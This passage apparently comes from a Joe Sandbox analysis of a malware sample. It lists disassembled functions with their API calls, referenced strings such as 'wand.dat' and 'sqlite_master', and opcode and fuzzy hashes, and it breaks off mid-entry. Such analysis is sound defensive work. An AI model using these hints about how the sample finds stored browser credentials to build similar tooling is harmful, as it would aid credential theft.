                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                            Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                            Strings
                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                            • API String ID: 1297977491-2063813899
                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                            Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040560C
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.*$dat$wand.dat
                                            • API String ID: 2618321458-1828844352
                                            • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                            • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                            Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                            • wcslen.MSVCRT ref: 00410C74
                                            • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                            • String ID:
                                            • API String ID: 1549203181-0
                                            • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                            • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                            Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00412057
                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                            • String ID:
                                            • API String ID: 3550944819-0
                                            • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                            • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                            Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • free.MSVCRT ref: 0040F561
                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$free
                                            • String ID: g4@
                                            • API String ID: 2888793982-2133833424
                                            • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                            • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                            Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: @
                                            • API String ID: 3510742995-2766056989
                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                            Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                            • memset.MSVCRT ref: 0040AF18
                                            • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@memcpymemset
                                            • String ID:
                                            • API String ID: 1865533344-0
                                            • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                            • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                            Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004144E7
                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                            • memset.MSVCRT ref: 0041451A
                                            • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                            • String ID:
                                            • API String ID: 1127616056-0
                                            • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                            • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                            Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                            • memset.MSVCRT ref: 0042FED3
                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: sqlite_master
                                            • API String ID: 438689982-3163232059
                                            • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                            • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                            Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                            • wcscpy.MSVCRT ref: 00414DF3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                            • String ID:
                                            • API String ID: 3917621476-0
                                            • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                            • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                            Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                            • _snwprintf.MSVCRT ref: 00410FE1
                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                            • _snwprintf.MSVCRT ref: 0041100C
                                            • wcscat.MSVCRT ref: 0041101F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                            • String ID:
                                            • API String ID: 822687973-0
                                            • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                            • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                            Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                            • malloc.MSVCRT ref: 00417459
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                            • free.MSVCRT ref: 0041747F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                            Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                            • RegisterClassW.USER32(00000001), ref: 00412428
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                            • String ID:
                                            • API String ID: 2678498856-0
                                            • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                            • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                            Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSend$Item
                                            • String ID:
                                            • API String ID: 3888421826-0
                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                            Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00417B7B
                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                            • GetLastError.KERNEL32 ref: 00417BB5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastLockUnlockmemset
                                            • String ID:
                                            • API String ID: 3727323765-0
                                            • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                            • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                            Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040F673
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                            • strlen.MSVCRT ref: 0040F6A2
                                            • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                            • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                            Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040F6E2
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                            • strlen.MSVCRT ref: 0040F70D
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
